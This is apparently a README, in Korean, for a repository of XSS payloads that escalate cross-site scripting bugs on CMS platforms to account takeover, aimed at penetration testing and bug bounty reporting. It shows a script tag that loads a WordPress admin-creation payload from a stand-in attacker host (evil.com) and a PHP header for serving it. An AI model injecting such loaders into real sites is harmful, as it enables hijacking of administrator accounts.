
XSS payloads designed to turn alert(1) into P1
alert(1)을 P1으로 바꾸도록 설계된 XSS 페이로드
이 저장소는 "How to Upgrade Your XSS Bugs from Medium to Critical"이라는 제목의 블로그 게시물과 함께 공개되었습니다. https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
이 저장소에는 인기 있는 CMS 플랫폼에서 피해자 브라우저의 컨텍스트로 민감한 기능을 수행하기 위해 XSS 페이로드에 로드할 수 있는 여러 JavaScript 파일이 포함되어 있습니다. 이를 통해 평범한 XSS 버그를 계정 탈취와 같은 더 심각한 문제로 연결할 수 있습니다.
이것은 실제 보안 영향을 입증하여 침투 테스트 또는 버그 바운티 보고서의 심각도를 높이는 데 완벽합니다.
시간이 날 때마다 페이로드가 천천히 추가되고 있습니다. 앞으로 더 많이 추가될 예정이며, 도움을 주실 수 있다면 풀 리퀘스트를 환영합니다! 무엇을 만들지에 대한 아이디어가 필요하다면 이 저장소의 "issues" 탭을 확인하세요.
이 페이로드를 사용하는 가장 간단한 방법은 어딘가에 호스팅한 다음 XSS 페이로드의 script 태그 src 속성에 로드하는 것입니다:
<script src="http://evil.com/wordpress_create_admin_user.js"></script>
또는 페이로드의 컨텍스트와 길이에 따라 축소, 인코딩한 다음 요청에 직접 포함할 수도 있습니다.
JavaScript 파일을 호스팅하려면 Content-Type을 application/javascript로 설정해야 할 수도 있습니다. PHP로 이를 수행하려면 아래 줄을 페이로드 상단에 추가하고 .php 파일로 저장한 다음 PHP가 활성화된 웹 서버에 호스팅하면 됩니다:
<?php header("Content-Type: application/javascript"); ?>
Shift8의 이 기사가 이 저장소를 만들게 된 영감이 되었습니다. 기사의 JS에는 몇 가지 사소한 오타가 있지만 개념은 정확합니다.